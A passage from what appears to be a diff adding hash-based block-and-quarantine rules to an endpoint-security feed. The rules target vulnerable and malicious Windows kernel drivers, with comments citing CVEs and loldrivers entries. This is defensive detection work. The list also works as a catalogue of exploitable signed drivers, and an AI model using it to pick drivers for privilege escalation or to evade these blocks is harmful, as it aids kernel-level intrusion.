"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823417Z", + "creation_date": "2026-03-23T11:45:31.823420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e3955aed83f0e304c0efbf18026eed1d85245cc2054cabf262df1e9654a8fdd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cfe67115-ca9b-5cf5-9ceb-5d06f894293c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455501Z", + "creation_date": "2026-03-23T11:45:30.455504Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff1ccef7374a1a5054a6f4437e3e0504b14ed76e17090cc6b1a4ec0e2da427a5", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d002d5bf-40ab-515b-b162-6c432b415b58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490367Z", + "creation_date": "2026-03-23T11:45:31.490369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27ae83e882c81045a7beaae03d886616e34e7501833f7f9e72297496d353bc39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0058350-395f-5d47-b7fc-0ef3c7b85594", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835055Z", + "creation_date": "2026-03-23T11:45:30.835058Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835068Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b18bd2b50c20ec6604521c8124fd68b6993cbfd0cdfd1c6447aa8dbe99770baa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d00b46e4-94e0-51a8-8697-37fcb387dc30", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973305Z", + "creation_date": "2026-03-23T11:45:29.973307Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973312Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c0b429e5935814457934fa9c10ac7a88e19068fa1bd152879e4e9b89c103921", + "comment": "Voicemod Sociedad Limitada vulnerable 
driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d013a2d2-b8e9-587c-a65e-0bd171642813", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823917Z", + "creation_date": "2026-03-23T11:45:30.823920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7a53a1bcf34c5ab990eafcb598ec7df3089388a1dbe085e4b190c0b82a6ec99", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0175763-87dd-5c01-abbb-71b86d9481f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487308Z", + "creation_date": "2026-03-23T11:45:31.487310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3a6b9ce2e106bfdb14cb1269c1f2f575c585ff36b3c69de2d4644a686939adf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d01af8fb-1a95-5e16-86d0-651f6d234e97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830168Z", + "creation_date": "2026-03-23T11:45:30.830170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79458431181462c1144b57d82ad913575876cdd8706a497c71db197a42f03f04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d033b9eb-fdc0-51ff-9f4f-ef98c83e746e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609503Z", + "creation_date": "2026-03-23T11:45:29.609505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35b1fdfa5cc9bb4a0d6e148140d59351447fa35c5c899e95da5f62a6b054af56", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d042018e-94da-543c-b5cc-cb0a939d5838", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143631Z", + "creation_date": "2026-03-23T11:45:32.143633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55b5bcbf8fb4e1ce99d201d3903d785888c928aa26e947ce2cdb99eefd0dae03", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0493bf7-56bd-5ead-b4c9-b39f059ed711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968150Z", + "creation_date": "2026-03-23T11:45:29.968152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968157Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d04aa591-d2d6-57c7-9120-7ea55a8cc728", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817817Z", + "creation_date": "2026-03-23T11:45:30.817820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817827Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03df432d7ff56ed53fd050b1875f5a05dffbe1c999adf2dd6c8d790b7ffd2c2d", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d04c93cd-9131-5b2c-83b6-1e86b4dd4e74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978808Z", + "creation_date": "2026-03-23T11:45:29.978810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"26536758c2247b6251a342d2e80de1753c006a0dce9b3b8a6a5b1d3110c8fc34", + "comment": "Vulnerable Kernel Driver (aka procexp152.sys) [https://www.loldrivers.io/drivers/0567c6c4-282f-406f-9369-7f876b899c25/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0512981-146d-55d3-bf78-922ee5bb4151", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828720Z", + "creation_date": "2026-03-23T11:45:30.828722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7a83480526e5e8bbba2d70f20998a1fec54379e97bbe4dac071206f62c59c15", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0545242-fe00-5d92-b6fd-9708bb597c7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453161Z", + "creation_date": "2026-03-23T11:45:30.453165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76276c87617b836dd6f31b73d2bb0e756d4b3d133bddfe169cb4225124ca6bfb", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d05bb891-3652-5cdf-ad7d-22936c2fc818", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613512Z", + "creation_date": "2026-03-23T11:45:29.613514Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f44442f56f2ceb6213fce103466862ac750fb99038030003c1b42da35a43a83", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d06835a0-027a-5118-a7ba-611302dd8f4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474372Z", + "creation_date": "2026-03-23T11:45:31.474375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474383Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cae1049a8fecdbbd851889fe654e624ea73ca17fb093ab47842098f16318d9ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0784d77-2d5b-54ac-aa14-0dcbaa4eff37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608910Z", + "creation_date": "2026-03-23T11:45:29.608912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c9c86ba5ae540bb5729626cdaec89ca421f8129e4bbf6e1ea49c532b44ea0c9", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d07ac2df-d545-58bb-b2d7-26c26c5556d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972861Z", + "creation_date": "2026-03-23T11:45:29.972863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972880Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "851961d7d327f813b5038f111f4ef31a38f8939ee7256603ccaa43dd5df742ab", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d08f246d-4a52-55f3-8aef-34b2014050bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467893Z", + "creation_date": "2026-03-23T11:45:30.467896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467904Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5f58cbce305cbd4397c1da5e1a51d78575c67616f6d9c7d764f87cda540fa62", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d08facc0-084d-51d0-9411-892415e3d826", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481042Z", + "creation_date": "2026-03-23T11:45:31.481046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481056Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "2635d308d65dd8a508926fa2ac7845d7484051a8a2124e32f265abb20a9221d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d09a0234-aa8d-5970-85ab-8b81cba5e529", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613969Z", + "creation_date": "2026-03-23T11:45:29.613971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ea9b2420483183cf7b25d6577848f2dfe2ae064a61d931d6b8b65b31a1b2685", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0ad21ce-2c8f-5c66-a6b2-6feada0fbda0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979895Z", + "creation_date": "2026-03-23T11:45:29.979896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979902Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b10f4f03eaa545d2fdb3b88890917a6fa24142689d3c43a7c39fc5bed5725bf", + "comment": "Malicious Kernel Driver (aka daxin_blank2.sys) [https://www.loldrivers.io/drivers/2e1531b2-d370-4543-9e2e-5319a1c13c22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0aef066-0b58-505a-a1a8-4f49216198f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619388Z", + "creation_date": "2026-03-23T11:45:29.619390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619395Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc65d8ade2e72475a585307311e3058b3dbc4a7d2be6740c2c53a5902e698e7f", + "comment": "Realtek vulnerable 
driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d0b0a482-264f-5e6b-9743-6774f4571a36", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490471Z", + "creation_date": "2026-03-23T11:45:31.490473Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 